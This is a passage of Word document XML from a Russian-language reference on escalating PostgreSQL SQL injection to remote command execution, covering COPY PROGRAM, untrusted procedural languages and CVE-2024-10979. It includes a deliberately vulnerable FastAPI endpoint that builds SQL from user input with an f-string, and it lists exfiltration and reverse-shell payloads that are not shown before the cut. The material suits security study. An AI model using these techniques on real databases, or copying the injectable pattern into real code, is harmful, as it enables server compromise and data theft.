                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Расширение установлено по умолчанию</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AE56C24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Managed-доступность</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1B3831BA"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F644B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1 COPY PROGRAM</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B72050" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>встроено в COPY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5F4BE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PG 11+: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ИЛИ superuser; PG ≤10: только superuser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EF57D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да (встроено)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090601" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — структурно недоступно на RDS / Cloud SQL / Supabase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="71F37C9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D86C7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2a plperlu</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6A890" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION plperlu</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3D7C25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>superuser (CREATE EXTENSION + CREATE FUNCTION)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D07D91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет; есть в contrib</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6E139F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — untrusted-расширения не предоставляются</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="54B00877"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00D301" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2b CVE-2024-10979</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AB8EED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (trusted)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96F176" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC + CREATE на user-schema; до фикса 17.1/16.5/15.9/14.14/13.17/12.21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BA3421" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет; есть в contrib</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6E9DFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>частично</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — plperl trusted иногда предоставляется (Cloud SQL да, RDS опционально), но патч там обычно накатан вовремя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="79CA16F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41AC5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.3 plpython3u / plsh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7DBA7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE EXTENSION plpython3u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>plsh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67ECF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>superuser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FA4700" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет; plpython3u в contrib, plsh — отдельный пакет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82963B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58E10C00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C965469" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3 `pg_read_server_files`, 3.6.4 `lo_export`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — file-read/write, не command execution. Цепочка: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web-shell → HTTP-запрос → RCE как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. саммари 3.6, перекрёстную ссылку в 3.7.3). Сам по себе file-write — не RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E311603" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.2 postgres_fdw SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SSRF к внутренним HTTP-endpoint, не command execution. Может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>привести</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к RCE через cloud metadata → IAM → cloud-side compromise, но это другой класс атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C265112" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — методы получения superuser или predefined-role. Все пути 3.7.1 / 3.7.2a / 3.7.3 требуют такого pre-flight; 3.13 описывает как до них добраться.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65011387" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron-extensions (`pg_cron`, `pgagent`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — могут запустить SQL по расписанию, но сами по себе не дают command execution; используются как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обвес</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к 3.7.1/3.7.2a/3.7.3 для отсроченного запуска. Кратко упоминаются в саммари 3.7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755702C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261252E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> COPY FROM/TO PROGRAM (R3) — три payload: one-shot exfil, reverse-shell, chain CVE-2025-1094 → COPY (R6 → R3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28023969" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plperlu untrusted (R7) — путь от superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78614968" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE-2024-10979 в plperl trusted (R7) — путь от PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A19EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plpython3u + plsh (упоминание plr / plv8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1C91C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.7.1 COPY FROM/TO PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1CDE23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... FROM PROGRAM 'cmd'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... TO PROGRAM 'cmd'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверные формы команды COPY, которые исполняют shell-команду на хосте через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> берёт stdout команды как входные данные для таблицы; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отправляет </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">результаты SELECT на stdin команды. В контексте инъекции — превращает SQL-execution в произвольное исполнение OS-команд под пользователем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это серверная фича PostgreSQL (не баг), внесена в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> начиная с PG 9.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82A993" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B04EF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/admin/reports.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED26B2B"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596619C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6BF61"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6118C3E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_admin_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2062B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B76D7C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FA41C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987AB53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/admin/table-stats")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4713B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def table_stats(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38DBB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33520247" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_admin_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2E2EDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8C2A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # admin-роль в БД имеет pg_execute_server_program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE06FF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (выдано для backup-скриптов и COPY-экспортов)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3319E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT count(*), pg_table_size('{table}') FROM {table}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6675E3AC"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53AC2A34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.one()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBFC3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + использование admin-сессии с выданным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = достаточные условия для эскалации до RCE при наличии stacked queries в драйвере (см. 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868607E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — one-shot эксфильтрация через TO PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A7B51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Минимальный RCE-проб: исполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
